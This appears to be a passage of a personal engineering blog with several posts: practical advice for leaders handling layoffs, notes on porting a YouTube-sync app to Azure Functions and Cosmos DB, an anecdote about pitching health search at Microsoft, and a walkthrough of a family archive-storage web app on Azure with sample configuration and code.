This week those memories came back to the surface, as another company I’m close to had to let a lot of good folks go. It bummed me out, and I fear that more companies will land in the same boat as we wrestle with the unsustainable state of today’s economy. Times like this are when leaders either shine or falter — I’ve done a little of both — but quite reasonably people are often hesitant to talk about their experiences. So let’s try to fill that gap — without further delay, some hard-won thoughts for leaders trying to make layoffs suck just a little bit less.

First and foremost: if you are a human, this is going to be really awful for you — hard decisions, hard conversations, personal grief and guilt, buckle up. I’m here for empathy and understanding. Beyond that: SUCK IT UP. No matter how bad it is for you, it’s a thousand times worse for the people going home to tell their families that they’ve lost their jobs. Your role is to be as transparent, honest, supportive and understanding as you can be, and to help everyone move on with the respect and dignity they deserve. Of course you’ll be sad — but remember, this is not about you, it’s about the people whose lives you are impacting.

1. Avoid the problem

You never have to lay off a person you didn’t hire in the first place.

Drugstore notwithstanding, I am not a fan of getting big fast, especially when it comes to FTEs. There is always pressure to do more, and it’s incredibly tempting to respond to that by asking for more headcount, which can come free and easy when the coffers are full of Series X funding. Beyond the fact that this rarely works in software anyways, it is likely to leave you people-heavy when money gets tight. And people are expensive — way more than you think. In my experience the “fully loaded” cost of an employee (including benefits, insurance, equipment and facilities, etc.) is around 2.5 times their salary and bonus alone. For better or worse, there is almost nothing you can do to reduce a budget faster than trim people.

So don’t add them until you know they have a long-term, structural purpose at the company. I also hate hiring contractors, but if you have a short-term burst of extra work, that can be a far better option. (If you can, contract on a project basis rather than as staff augmentation — it makes performance far easier to evaluate and gives you obvious go/no-go milestones.)

Your CEO is going to hate this advice. Hiring people feels good, and makes execs feel like their business is growing (pro tip: measure revenue instead). You may also have mentors that tell you to grab budget “when you can” — this may be good ladder-climbing advice, but it is irresponsible business management.

2. Try other stuff first

When you’re sitting face-to-face with somebody you’re letting go, you’re almost certainly going to tell them that it was a last resort — so make sure that’s true.

People costs do tend to dominate budgets, but there are other levers. Reduce travel and face-to-face meetings. Get rid of the fancy coffee makers. Delay a project for a quarter. Reduce benefits in a way that spreads a little pain across the whole company, maybe a year without bonuses or higher insurance copays. Be careful with these, because giving up a bonus is a lot easier for somebody making $250K than somebody making $25K.

But look at everything, because you probably also told folks that you were “like a family,” and a family works really hard to make ends meet before they sell a kid to the circus. So put in the work. Even if it isn’t enough in the end, people will see and appreciate that you honestly tried.

3. Day Of

First, understand that there is no “good” way to run a large-scale layoff — it doesn’t exist. There are already rumors floating around, even if you think there aren’t. While it’s ideal for everyone to be notified at the same time, it’s even more important that individuals learn their situation 1:1 and not through a mass email (or tweet). Reactions will vary: some folks will take the news well; most will be upset and a little embarrassed; a few may become angry and even belligerent. The best you can hope for is to get through the day maximizing for timely, straightforward personal notifications and efficient, minimally-awkward exits. Here’s what I’ve seen work best:

  1. BEFORE the day arrives, be sure you’re prepared:
    1. Have your severance package locked and described clearly in a printed document you can hand to affected employees. If you can continue healthcare coverage for a few months, that seems to have the biggest positive impact.
    2. Assemble a comprehensive Q&A document. As a leadership group, try to imagine every question you will be asked and have a ready answer. Read this Q&A a bunch! You do not want to be improvising in the moment.
    3. Make sure your IT department is looped in and is ready to manage accounts and access.
  2. ONE DAY BEFORE, schedule meetings.
    1. First, set up individual meetings with each affected employee, in a private conference room. Each employee should hear the news from their manager (or a level up if there is a relationship there). If your company has the resources, there should be an HR person in the room. Start these early and pack them together as closely as possible. 20 minutes is a good amount of time.
    2. Take particular care if there are affected folks on vacation or leave. It may be impossible to contact them in a timely way; just do your best.
    3. Schedule an “all-hands” meeting in the early afternoon or as soon as you’re able to finish individual meetings. This invite should be sent to the whole company, not just the remaining team.
  3. THE MORNING OF, try to manage individual meetings as best you can:
    1. Begin with the manager explaining that the company is having a layoff and their job is going away. It’s worth stressing this: it’s the job, not the person. Words do make a difference.
    2. Thank the person for the work and energy they have contributed to your shared mission. Reinforce that this is about streamlining costs and is unrelated to their job performance.
    3. Reiterate that the change is effective immediately. Describe the severance topline — just enough so that they know they have some economic support. Give them their physical package, and tell them to read through it carefully at home. You probably want them to sign an acknowledgement of receipt (not agreement). It is often better for HR to give this part of the message if that’s an option.
    4. Answer questions but really really try to stick to the Q&A. Don’t let it go too long or become a circular conversation.
    5. During the meeting, IT should freeze the employee’s email, access keys, VPN access and any other corporate accounts. This is terrible, but important — a single employee with a kneejerk reaction can do great damage not just to the company but to themselves as well. Much better to just remove the risk.
    6. Tell the employee to go home (unless they’re remote anyways), absorb their severance package, and to contact HR if they have any questions. This is also tricky — have somebody walk with them to pick up car keys and other items from their desk before leaving. They should not stay in the office, even just to “let people know.” If they grab a plant or two that they can carry, that’s fine. But do not have them “clean out” their office at this time … make a plan to box up things for pickup later, or schedule after-hours times for people to come back. This is not about risk the same way that IT access is — it is simply better to create some separation immediately so everyone can process in their own way.
  4. THE AFTERNOON OF, talk to remaining employees at the all-hands meeting.
    1. It’s OK to be sad … how could you not be? Share that with the team; let everyone be sad together. But don’t wallow and don’t make it about yourself.
    2. Take responsibility for the decision. Explain how you got here, and why you believe this is the best course of action. External factors are real, but if the company was over-leveraged because of mistakes, own that too. Explain not what you would do in hindsight, but how you’re going to do better going forward.
    3. Tell them the three-month plan. Remember, right now everyone thinks that this was just the first layoff with more to come — why should they stay engaged?
    4. Take Q&A, but keep it limited and do not improvise. Use the same materials you prepped for individual meetings.
    5. Keep it short. Tell everyone to go home for the day and decompress — tomorrow we dig in and start again.
  5. THE EVENING OF, try to close this chapter so you can move on.
    1. Send a company-wide email re-stating what you said in the all-hands meeting. Remind folks it’s great to reach out to their ex-colleagues, professionally to help with their job search and personally because they are real humans that we still love.
    2. Breathe. Give your family a hug. Call your mom. Have a beer or a tea or a whiskey and go to bed. You’ve done your best.

4. The Next Day and Moving Forward

Your most important job today, and for the next few days, is to show up.

Yesterday people needed a little time to themselves; today they need to see that your company is alive and vibrant and making magic. That doesn’t mean ignoring what happened or pretending your ex-colleagues don’t exist. On the contrary, it’ll be the number one topic of conversation, and you should be prepared for a steady stream of folks looking to you for understanding and a reason to believe. But most importantly, you and other company leaders just need to be there. This is a very easy time to disappear and avoid the tough conversations — don’t let that happen.

Shoulders back, head up, let’s go.

Tactically, there is now (by definition) more work to do than people to do it. Make sure you account for this as you reallocate projects and responsibilities. If you can cancel or postpone things (you can), do that so people know that you understand that this is tough for them too. If there is work that you personally can pick up, do it. This is one of those crisis times when teams either bond together or fall apart, so do whatever you can to nudge things the right way.

I guess that’s about it. Surprisingly emotional to even write about — but hopefully a useful roadmap, and a reminder that this stuff isn’t a game. It’s lives, careers, dignity and responsibility — what you do and how you handle it matters. Step up!

Shutdown Radio on Azure

Back about a year ago when I was playing with ShutdownRadio, I ranted a bit about my failed attempt to implement it using Azure Functions and Cosmos. Just to recap, dependency conflicts in the official Microsoft Java libraries made it impossible to use these two core Azure technologies together — so I punted. I planned to revisit an Azure version once Microsoft got their sh*t together, but life moved on and that never happened.

Separately, a couple of weeks ago I decided I should learn more about chatbots in general and the Microsoft Bot Framework in particular. “Conversational” interfaces are popping up more and more, and while they’re often just annoyingly obtuse, I can imagine a ton of really useful applications. And if we’re ever going to eliminate unsatisfying jobs from the world, bots that can figure out what our crazily imprecise language patterns mean are going to have to play a role.

No joke, this is what my Bellevue workbench looks like right now, today.

But heads up, this post isn’t about bots at all. You know that thing where you want to do a project, but you can’t do the project until the workbench is clean, but you can’t clean up the workbench until you finish the painting job sitting on the bench, but you can’t finish that job until you go to the store for more paint, but you can’t go to the store until you get gas for the car? Yeah, that’s me.

My plan was to write a bot for Microsoft Teams that could interact with ShutdownRadio and make it more natural/engaging for folks that use Teams all day for work anyways. But it seemed really silly to do all of that work in Azure and then call out to a dumb little web app running on my ancient Rackspace VM. So that’s how I got back to implementing ShutdownRadio using Azure Functions. And while it was generally not so bad this time around, there were enough gotchas that I thought I’d immortalize them for Google here before diving into the shiny new fun bot stuff. All of which is to say — this post is probably only interesting to you if you are in fact using Google right now to figure out why your Azure code isn’t working. You have been warned.

A quick recap of the app

The idea of ShutdownRadio is for people to be able to curate and listen to (or watch I suppose) YouTube playlists “in sync” from different physical locations. There is no login and anyone can add videos to any channel — but there is also no list of channels, so somebody has to know the channel name to be a jack*ss. It’s a simple, bare-bones UX — the only magic is in the synchronization that ensures everybody is (for all practical purposes) listening to the same song at the same time. I talked more about all of this in the original article, so won’t belabor it here.

For your listening pleasure, I did migrate over the “songs by bands connected in some way to Seattle” playlist that my colleagues at Adaptive put together in 2020. Use the channel name “seattle” to take it for a spin; there’s some great stuff in there!

Moving to Azure Functions

The concept of Azure Functions (or AWS Lambda) is pretty sweet — rather than deploying code to servers or VMs directly, you just upload “functions” (code packages) to the cloud, configure the endpoints or “triggers” that allow users to execute them (usually HTTP URLs), and let your provider figure out where and how to run everything. This is just one flavor of the “serverless computing” future that is slowly but surely becoming the standard for everything (and of course there are servers, they’re just not your problem). ShutdownRadio exposes four of these functions:

  • /home simply returns the static HTML page that embeds the video player and drives the UX. Easy peasy.
  • /channel returns information about the current state of a channel, including the currently-playing video.
  • /playlist returns all of the videos in the channel.
  • /addVideo adds a new video to the channel.

Each of these routes was originally defined in Handlers.java as HttpHandlers, the construct used by the JDK internal HttpServer. After creating the Functions project using the “quickstart” maven archetype, lifting these over to Azure Functions in Functions.java was pretty straightforward. The class names are different, but the story is pretty much the same.
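
For context, an HTTP-triggered function in Java ends up looking roughly like this. It's a simplified sketch rather than the actual Functions.java, and lookupChannelJson is a hypothetical stand-in for the real storage call:

import java.util.Optional;
import com.microsoft.azure.functions.*;
import com.microsoft.azure.functions.annotation.*;

public class FunctionsSketch {
    // Rough shape of an HTTP-triggered function; the real code returns channel state as JSON.
    @FunctionName("channel")
    public HttpResponseMessage channel(
            @HttpTrigger(name = "req",
                         methods = { HttpMethod.GET },
                         authLevel = AuthorizationLevel.ANONYMOUS,
                         route = "channel")
            HttpRequestMessage<Optional<String>> request,
            final ExecutionContext context) {

        String channelName = request.getQueryParameters().getOrDefault("channel", "default");
        String json = lookupChannelJson(channelName);  // stand-in for the real backend lookup

        return request.createResponseBuilder(HttpStatus.OK)
                      .header("Content-Type", "application/json")
                      .body(json)
                      .build();
    }

    private static String lookupChannelJson(String name) {
        return "{\"channel\":\"" + name + "\"}";  // placeholder
    }
}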

Routes and Proxies

My goal was to make minimal changes to the original code — obviously these handlers needed to change, as well as the backend store (which we’ll discuss later), but beyond that I wanted to leave things alone as much as possible. By default Azure Functions prepends “/api/” to HTTP routes, but I was able to match the originals by turfing that in the host.json configuration file:

"extensions": {
       "http": {
             "routePrefix": ""
       }
}

A trickier routing issue was getting the “root” page to work (i.e., “/” instead of “/home“). Functions are required to have a non-empty name, so you can’t just use “” (or “/” yes I tried). It took a bunch of digging but eventually Google delivered the goods in two parts:

  1. Function apps support “proxy” rules via proxies.json that can be abused to route requests from the root to a named function (note the non-obvious use of “localhost” in the backendUri value to proxy routes to the same application). A rough example follows this list.
  2. The maven-resources-plugin can be used in pom.xml to put proxies.json in the right place at packaging time so that it makes it up to the cloud.
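
A minimal proxies.json along those lines looks something like this (the rule name is arbitrary and the real file is in the repo):

{
  "$schema": "http://json.schemastore.org/proxies",
  "proxies": {
    "root": {
      "matchCondition": {
        "methods": [ "GET" ],
        "route": "/"
      },
      "backendUri": "https://localhost/home"
    }
  }
}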

Finally, the Azure portal “TLS/SSL settings” panel can be used to force all requests to use HTTPS. Not necessary for this app but a nice touch.

All of this seems pretty obscure, but for once I’m inclined to give Microsoft a break. Functions really aren’t meant to implement websites — they have Azure Web Apps and Static Web Apps for that. In this case, I just preferred the Functions model — so the weird configuration is on me.

Moving to Cosmos

I’m a little less sanguine about the challenges I had changing the storage model from a simple directory of files to Cosmos DB. I mean, the final product is really quite simple and works well, so that’s cool. But once again I ran into lazy client library issues and random inconsistencies all along the way.

There are a bunch of ways to use Cosmos, but at heart it’s just a super-scalable NoSQL document store. Honestly I don’t really understand the pedigree of this thing — back in the day “Cosmos” was the in-house data warehouse used to do analytics for Bing Search, but that grew up super-organically with a weird, custom batch interface. I can’t imagine that the public service really shares code with that dinosaur, but as far as I can tell it’s not a fork of any of the big open source NoSQL projects either. So where did it even come from — ground up? Yeesh, only at Microsoft.

Anyhoo, after creating a Cosmos “account” in the Azure portal, it’s relatively easy to create databases (really just namespaces) and containers within them (more like what I would consider databases, or maybe big flexible partitioned tables). Containers hold items which natively are just JSON documents, although they can be made to look like table rows or graph elements with the different APIs.

Access using a Managed Identity

One of the big selling points (at least for me) of using Azure for distributed systems is its support for managed identities. Basically each service (e.g., my Function App) can have its own Active Directory identity, and this identity can be given rights to access other services (e.g., my Cosmos DB container). These relationships completely eliminate the need to store and manage service credentials — everything just happens transparently without any of the noise or risk that comes with traditional service-to-service authentication. It’s beautiful stuff.

Of course, it can be a bit tricky to make this work on dev machines — e.g., the Azure Function App emulator doesn’t know squat about managed identities (it has all kinds of other problems too but let’s focus here). The best (and I think recommended?) approach I’ve found is to use the DefaultAzureCredentialBuilder to get an auth token. The pattern works like this:

  1. In the cloud, configure your service to use a Managed Identity and grant access using that.
  2. For local development, grant your personal Azure login access to test resources — then use “az login” at the command-line to establish credentials on your development machine.
  3. In code, let the DefaultAzureCredential figure out what kind of token is appropriate and then use that token for service auth.

The DefaultAzureCredential iterates over all the various and obtuse authentication types until it finds one that works — with production-class approaches like ManagedIdentityCredential taking higher priority than development-class ones like AzureCliCredential. Net-net it just works in both situations, which is really nice.
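
In code, the whole dance collapses to something like this sketch (the endpoint and names are placeholders):

import com.azure.cosmos.CosmosClient;
import com.azure.cosmos.CosmosClientBuilder;
import com.azure.cosmos.CosmosContainer;
import com.azure.identity.DefaultAzureCredentialBuilder;

public class CosmosAuthSketch {
    public static CosmosContainer getContainer() {
        // DefaultAzureCredential picks ManagedIdentityCredential in the cloud
        // and falls back to AzureCliCredential ("az login") on a dev box.
        CosmosClient client = new CosmosClientBuilder()
            .endpoint("https://COSMOS_ACCOUNT.documents.azure.com:443/")  // placeholder
            .credential(new DefaultAzureCredentialBuilder().build())
            .buildClient();

        return client.getDatabase("COSMOS_DATABASE")      // placeholder names
                     .getContainer("COSMOS_CONTAINER");
    }
}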

Unfortunately, admin support for managed identities (or really any role-based access) with Cosmos is just stupid. There is no way to set it up using the portal — you can only do it via the command line with the Azure CLI or Powershell. I’ve said it before, but this kind of thing drives me absolutely nuts — it seems like every implementation is just random. Maybe it’s here, maybe it’s there, who knows … it’s just exhausting and inexcusable for a company that claims to love developers. But whatever, here’s a snippet that grants an AD object read/write access to a Cosmos container:

az cosmosdb sql role assignment create \
       --account-name 'COSMOS_ACCOUNT' \
       --resource-group 'COSMOS_RESOURCE_GROUP' \
       --scope '/dbs/COSMOS_DATABASE/colls/COSMOS_CONTAINER' \
       --principal-id 'MANAGED_IDENTITY_OR_OTHER_AD_OBJECT' \
       --role-definition-id '00000000-0000-0000-0000-000000000002'

The role-definition id there is a built-in CosmosDB “contributor” role that grants read and write access. The “scope” can be omitted to grant access to all databases and containers in the account, or just truncated to /dbs/COSMOS_DATABASE for all containers in the database. The same command can be used with your Azure AD account as the principal-id.

Client Library Gotchas

Each Cosmos Container can hold arbitrary JSON documents — they don’t need to all use the same schema. This is nice because it meant I could keep the “channel” and “playlist” objects in the same container, so long as they all had unique identifier values. I created this identifier by adding an internal “id” field on each of the objects in Model.java — the analog of the unique filename suffix I used in the original version.
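
The read/write pattern then looks roughly like this. Channel is a stand-in for the real model classes, and the sketch assumes the container is partitioned on id:

import com.azure.cosmos.CosmosContainer;
import com.azure.cosmos.models.PartitionKey;

public class ModelSketch {
    // A stand-in for the real model objects; the "id" field is what lets
    // mixed document types coexist happily in one container.
    public static class Channel {
        public String id;        // hypothetical example: "channel:seattle"
        public String name;
        public String currentVideoId;
    }

    public static void save(CosmosContainer container, Channel channel) {
        container.upsertItem(channel);
    }

    public static Channel load(CosmosContainer container, String id) {
        // assumes the partition key path is the id itself
        return container.readItem(id, new PartitionKey(id), Channel.class).getItem();
    }
}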

The base Cosmos Java API lets you read and write POJOs directly using generics and the serialization capabilities of the Jackson JSON library. This is admittedly cool — I use the same pattern often with Google’s Gson library. But here’s the rub — the library can’t serialize common types like the ones in the java.time namespace. In and of itself this is fine, because Jackson provides a way to add serialization modules to do the job for unknown types. But the recommended way of doing this requires setting values on the ObjectMapper used for serialization, and that ObjectMapper isn’t exposed by the client library for public use. Well technically it is, so that’s what I did — but it’s a hack using stuff inside the “implementation” namespace:

log.info("Adding JavaTimeModule to Cosmos Utils ObjectMapper");
com.azure.cosmos.implementation.Utils.getSimpleObjectMapper().registerModule(new JavaTimeModule());

Side note: long after I got this working, I stumbled onto another approach that uses Jackson annotations and doesn’t require directly referencing private implementation. That’s better, but it’s still a crappy, leaky abstraction that requires knowledge and exploitation of undocumented implementation details. Do better, Microsoft!

Pop the Stack

Minor tribulations aside, ShutdownRadio is now happily running in Azure — so mission accomplished for this post. And when I look at the actual code delta between this version and the original one, it’s really quite minimal. Radio.java, YouTube.java and player.html didn’t have to change at all. Model.java took just a couple of tweaks, and I could have even avoided those if I were being really strict with myself. Not too shabby!

Now it’s time to pop this task off of the stack and get back to the business of learning about bots. Next stop, ShutdownRadio in Teams …and maybe Skype if I’m feeling extra bold. Onward!

Refine your search for “gunshot wound”

I tend to be a mostly forward-looking person, but there’s nothing like a bit of nostalgia once in awhile.

After finally putting together a pretty solid cold storage solution for the family, I spent a little time going through my own document folders to see if there was anything there I really didn’t want to lose. The structure there is an amusing recursive walk through the last fifteen years of my career — each time I get a new laptop I just copy over my old Documents folder, so it looks like this:

  • seanno99 – Documents
    • some files
    • seanno98 – Documents
      • some files
      • seanno97 – Documents
        • some files
        • seanno96 – Documents
          • etc.

Yeah of course there are way better ways to manage this. But the complete lack of useful organization does set the stage for some amusing archeological discoveries. Case in point, last night I stumbled across a bunch of screen mocks for the service that ultimately became the embedded “Health Answer” in Bing Search (this was a long time ago, I don’t know if they still call them “Answers” or not, and I’m quite sure the original code is long gone).

One image in particular brought me right back to a snowy day in Redmond, Washington — one of my favorite memories in a luck-filled career full of great ones, probably about nine months before the mock was created.

Back then, the major engines didn’t really consider “health” to be anything special. This was true of most specialized domains — innovations around generalized search were coming so hot and heavy that any kind of curation or specialized algorithms just seemed like a waste of time. My long-time partner Peter Neupert and I believed that this was a mistake, and that “health” represented a huge opportunity for Microsoft both in search and elsewhere. There was a bunch of evidence for this that isn’t worth spending time on here — the important part is that we were confident enough to pitch Microsoft on creating a big-time, long-term investment in the space. I’m forever thankful that I was introduced to Peter way back in 1998; he has a scope of vision that I’ve been drafting off for a quarter century now.

Anyways, back in the late Fall of 2005 we were set to pitch this investment to Steve and Bill. The day arrives and it turns out that the Northwest has just been hit by a snowstorm — I can’t find a reference to the storm anywhere online, so it was probably something lame like six inches, but that’s more than enough to knock out the entire Seattle area. There is no power on the Microsoft campus and most folks are hiding in their homes with a stock of fresh water and canned soup. But Steve and Bill apparently have a generator in their little office kingdom, so we’re on. Somebody ran an extension cord into the conference room and set up a few lights, but there’s this great shadowy end-of-the-world vibe in the room — sweet. So we launch into our song and dance, a key part of which is the importance of health-specific search.

And here comes Bill. Now, he has gotten a lot of sh*t in the press lately, and I have no reason to question the legitimacy of the claims being made. This bums me out, because Bill Gates is one of the very few people in the world that I have been truly impressed by. He is scary, scary smart — driven by numbers and logic, and just as ready to hear that he’s an idiot as he is to tell you that you are. For my purposes here, I choose to remember this Bill, the one I’ve gotten to interact with.

“This is the stupidest idea I have ever heard.”

Bill dismisses the entire idea that people would search for issues related to their health. He expresses this with a small one-act play: “Oh, oh, I’ve been shot!” — he clutches his chest and starts dragging himself towards the table — “I don’t know what to do, let me open up my computer” — he stumbles and hauls himself up to the laptop — “No need for the ER, I’ll just search for ‘gunshot wound’” — sadly he collapses before he can get his search results. And, scene.

Suffice to say that backing down is not the right way to win a debate with Bill. I remember saying something that involved the words “ridiculous” and “bullsh*t” but that’s it — I was in The Zone. Fast forward about a week, the snow melted and Peter did some background magic and our funding was in the bag.

A few months later, we ended up buying a neat little company called Medstory that had created an engine dedicated to health search. And thus were born the “HealthVault Search” mocks that I found deep in the depths of my archives the other day. The best part? If you’ve looked at the image, you already know the punch line: GUNSHOT WOUND was immortalized as the go-to search phrase for the first image presented — every meeting, every time.

Bing!

Cold Storage on Azure

As the story goes, Steve Jobs once commissioned a study to determine the safest long-term storage medium for Apple’s source code. After evaluating all the most advanced technologies of the day (LaserDisc!), the team ended up printing it all out on acid-free paper to be stored deep within the low-humidity environment at Yucca Mountain — the theory being that our eyes were the most likely data retrieval technology to survive the collapse of civilization. Of course this is almost certainly false, but I love it anyways. Just like the (also false) Soviet-pencils-in-space story, there is something very Jedi about simplicity outperforming complexity. If you need me, I’ll be hanging out in the basement with Mike Mulligan and Mary Anne.

Image credit Wikipedia

Anyways, I was reminded of the Jobs story the other day because long-term data storage is something of a recurring challenge in the Nolan household. In the days of hundreds of free gigs from consumer services, you wouldn’t think this would be an issue, and yet it is. In particular my wife takes a billion pictures (her camera takes something like fifty shots for every shutter press), and my daughter has created an improbable tidal wave of video content.

Keeping all this stuff safe has been a decades-long saga including various server incarnations, a custom-built NAS in the closet, the usual online services, and more. They all have fatal flaws, from reliability to cost to usability. Until very recently, the most effective approach was a big pile of redundant drives in a fireproof safe. It’s honestly not a terrible system; you can get 2TB for basically no money these days, so keeping multiple copies of everything isn’t a big deal. Still not great though — mean time to failure for both spinning disks and SSD remains sadly low — so we need to remember to check them all a couple of times each year to catch hardware failures. And there’s always more. A couple of weeks ago, as my daughter’s laptop was clearly on the way out, she found herself trying to rescue yet more huge files that hadn’t made it to the safe.

Enter Glacier (and, uh, “Archive”)

It turns out that in the last five years or so a new long-term storage approach has emerged, and it is awesome.

Object (file) storage has been a part of the “cloud” ever since there was a “cloud” — Amazon calls their service S3; Microsoft calls theirs Blob Storage.  Conceptually these systems are quite simple: files are uploaded to and downloaded from virtual drives (“buckets” for Amazon, “containers” for Azure) using more-or-less standard web APIs. The files are available to anyone anywhere that has the right credentials, which is super-handy. But the real win is that files stored in these services are really, really unlikely to be lost due to hardware issues. Multiple copies of every file are stored not just on multiple drives, but in multiple regions of the world — so they’re good even if Lex Luthor does manage to cleave off California into the ocean (whew). And they are constantly monitored for hardware failure behind the scenes. It’s fantastic.

But as you might suspect, this redundancy doesn’t come for free. Storing a 100 gigabyte file in “standard” storage goes for about $30 per year (there are minor differences between services and lots of options that can impact this number, but it’s reasonably close), which is basically the one-and-done cost of a 2 terabyte USB stick! This premium can be very much worth it for enterprises, but it’s hard to swallow for home use.

Ah, but wait. These folks aren’t stupid, and realized that long-term “cold” storage is its own beast. Once stored, these files are almost never looked at again — they just sit there as a security blanket against disaster. By taking them offline (even just by turning off the electricity to the racks), they could be stored much more cheaply, without sacrificing any of the redundancy. The tradeoff is only that if you do need to read the files, bringing them back online takes some time (about half a day generally) — not a bad story for this use case. Even better, the teams realized that they could use the same APIs for both “active” and “cold” file operations — and even move things between these tiers automatically to optimize costs in some cases.

Thus was born Amazon Glacier and the predictably-boringly-named Azure Archive Tier. That same 100GB file in long-term storage costs just $3.50 / year … a dramatically better cost profile, and something I can get solidly behind for family use. Woo hoo!

But Wait

The functionality is great, and the costs are totally fine. So why not just let the family loose on some storage and be done with it? As we often discover, the devil is in the user experience. Both S3 and Blob Storage are designed as building blocks for developers and IT nerds — not for end users. The native admin tools are a non-starter; they exist within an uber-complex web of cloud configuration tools that make it very easy to do the wrong thing. There are a few hideously-complicated apps that all look like 1991 FTP clients. And there are a few options for using the services to manage traditional laptop backups, but they all sound pretty sketchy and that’s not our use case here anyways.

Sounds like a good excuse to write some code! I know I’m repeating myself but … whether it’s your job or not, knowing how to code is the twenty-first century superpower. Give it a try.

The two services are basically equivalent; I chose to use Azure storage because our family is already deep down the Microsoft rabbit hole with Office365. And this time I decided to bite the bullet and deploy the user-facing code using Azure as well — in particular an Azure Static Web App using the Azure Storage Blob client library for JavaScript. You can create a “personal use” SWA for free, which is pretty sweet. Unfortunately, Microsoft’s shockingly bad developer experience strikes again and getting the app to run was anything but “sweet.” At its height my poor daughter was caught up in a classic remote-IT-support rodeo, which she memorialized in true Millennial Meme form.

Anyhoo — the key features of an app to support our family use case were pretty straightforward:

  1. Simple user experience, basically a “big upload button”.
  2. Login using our family Office365 accounts (no new passwords).
  3. A segregated personal space for each user’s files.
  4. An “upload” button to efficiently push files directly into the Archive tier.
  5. A “thaw” button to request that a file be copied to the Cool tier so it can be downloaded.
  6. A “download” button to retrieve thawed files.
  7. A “delete” button to remove files from either tier.

One useful feature I skipped — given that the “thawing” process can take about fifteen hours, it would be nice to send an email notification when that completes. I haven’t done this yet, but Azure does fire events automatically when rehydration is complete — so it’ll be easy to add later.

For the rest of this post, we’ll decisively enter nerd-land as I go into detail about how I implemented each of these. Not a full tutorial, but hopefully enough to leave some Google crumbs for folks trying to do similar stuff. All of the code is up on github in its own repository; feel free to use any of it for your own purposes — and let me know if I can help with anything there.

Set up the infrastructure

All righty. First you’ll need an Azure Static Web App. SWAs are typically deployed directly from github; each time you check in, the production website will automatically be updated with the new code. Set up a repo and the Azure SWA using this quickstart (use the personal plan). Your app will also need managed APIs — this quickstart shows how to add and test them on your local development machine. These quickstarts both use Visual Studio Code extensions — it’s definitely possible to do all of this without VSCode, but I don’t recommend it. Azure developer experience is pretty bad; sticking to their preferred toolset at least minimizes unwelcome surprises.

You’ll also need a Storage Account, which you can create using the Azure portal. All of the defaults are reasonable, just be sure to pick the “redundancy” setting you want (probably “Geo-redundant storage”). Once the account has been created, add a CORS rule (in the left-side navigation bar) that permits calls from your SWA domain (you’ll find this name in the “URL” field of the overview page for the SWA in the Azure portal).

Managing authentication with Active Directory

SWAs automatically support authentication using accounts from Active Directory, Github or Twitter (if you choose the “standard” pricing plan you can add your own). This is super-nice and reason alone to use SWA for these simple little sites — especially for my case where the users in question are already part of our Azure AD through Office365. Getting it to work correctly, though, is a little tricky.

Code in your SWA can determine the users’ logged-in status in two ways: (1) from the client side, make an Ajax call to the built-in route /.auth/me, which returns a JSON object with information about the user, including their currently-assigned roles; (2) from API methods, decode the x-ms-client-principal header to get the same information.
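
The JSON that comes back from /.auth/me looks more or less like this (values made up):

{
  "clientPrincipal": {
    "identityProvider": "aad",
    "userId": "d75b260a64504067bfc5b2905e3b8182",
    "userDetails": "somebody@example.com",
    "userRoles": [ "anonymous", "authenticated", "contributor" ]
  }
}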

By default, all pages in a SWA are open for public access and the role returned will be “anonymous”. Redirecting a user to the built-in route /.auth/aad will walk them through a standard AD login experience. By default anyone with a valid AD account can log in and will be assigned the “authenticated” role. If you’re ok with that, then good enough and you’re done. If you want to restrict your app only to specific users (as I did), open up the Azure portal for your SWA and click “Role management” in the left-side navigation bar. From here you can “invite” specific users and grant them custom roles (I used “contributor”) — since only these users will have your roles, you can filter out the riff-raff.

Next you have to configure routes in the file staticwebapp.config.json in the same directory with your HTML files to enforce security. There’s a lot of ways to do this and it’s a little finicky because your SWA has some hidden routes that you don’t want to accidentally mess with. My file is here; basically it does four things (approximated in the snippet after the list):

  1. Allows anyone to view the login-related pages (/.auth/*).
  2. Restricts the static and api files to users that have my custom “contributor” role.
  3. Redirects “/” to my index.html page.
  4. Redirects to the AD auth page when needed to prompt login.
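
Approximately (this isn't the exact file; check the repo for the real one), the config looks like:

{
  "routes": [
    { "route": "/.auth/*", "allowedRoles": [ "anonymous", "authenticated" ] },
    { "route": "/api/*", "allowedRoles": [ "contributor" ] },
    { "route": "/", "redirect": "/index.html" },
    { "route": "/*", "allowedRoles": [ "contributor" ] }
  ],
  "responseOverrides": {
    "401": { "redirect": "/.auth/login/aad", "statusCode": 302 }
  }
}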

I’m sure there’s a cleaner way to make all this happen, but this works and makes sense to me, so onward we go.

Displaying files in storage

The app displays files in two tables: one for archived files (in cold storage) and one for active ones that are either ready to download or pending a thaw. Generating the actual HTML for these tables happens on the client, but the data is assembled at the server. The shared “Freezer” object knows how to name the user’s personal container from their login information and ensure it exists. The listFiles method then calls listBlobsFlat to build the response object.

There are more details on the “thawing” process below, but note that if a blob is in the middle of thawing we identify it using the “archiveStatus” property on the blob. Other than that, this is a pretty simple iteration and transformation. I have to mention again just how handy JSON is these days — it’s super-easy to cons up objects and return them from API methods.
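
In sketch form, that iteration looks something like this (the shape of the returned objects is illustrative; the real freezer.js builds its own response):

    // sketch: walk the user's container and build a simple list for the client
    async function listFiles(containerClient) {

      const files = [];

      for await (const blob of containerClient.listBlobsFlat()) {
        files.push({
          name: blob.name,
          size: blob.properties.contentLength,
          tier: blob.properties.accessTier,          // "Hot", "Cool", "Archive"
          thawing: !!blob.properties.archiveStatus   // set while a rehydrate is pending
        });
      }

      return(files);
    }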

Uploading

Remember the use case here is storing big files — like tens to hundreds of gigabytes big. Uploading things like that to the cloud is a hassle no matter how you do it, and browsers in particular are not known for their prowess at the job. But we’re going to try it anyways.

In the section above, the browser made a request to our own API (/api/listFiles), which in turn made requests to the Azure storage service. That works fine when the data packages are small, but when you’re trying to push a bunch of bytes, having that API “middleman” just doesn’t cut it. Instead, we want to upload the file directly from the browser to Azure storage. This is why we had to set up a CORS rule for the storage account, because otherwise the browser would reject the “cross-domain” request to https://STORAGE_ACCT.blob.core.windows.net where the files live.

no preflight cache for PUT, so sad

The same client library that we’ve been using from the server (node.js) environment will work in client-side JavaScript as well — sort of. Of course, because it’s a Microsoft client library, it depends on about a dozen random npm packages (punycode, tough-cookie, universalify, the list goes on), and getting all of this into a form that the browser can use requires a “bundler.” They actually have some documentation on this, but it leaves some gaps — in particular, how best to use the bundled files as a library. I ended up using webpack to make the files, with a little index.js magic to expose the stuff I needed. It’s fine, I guess.

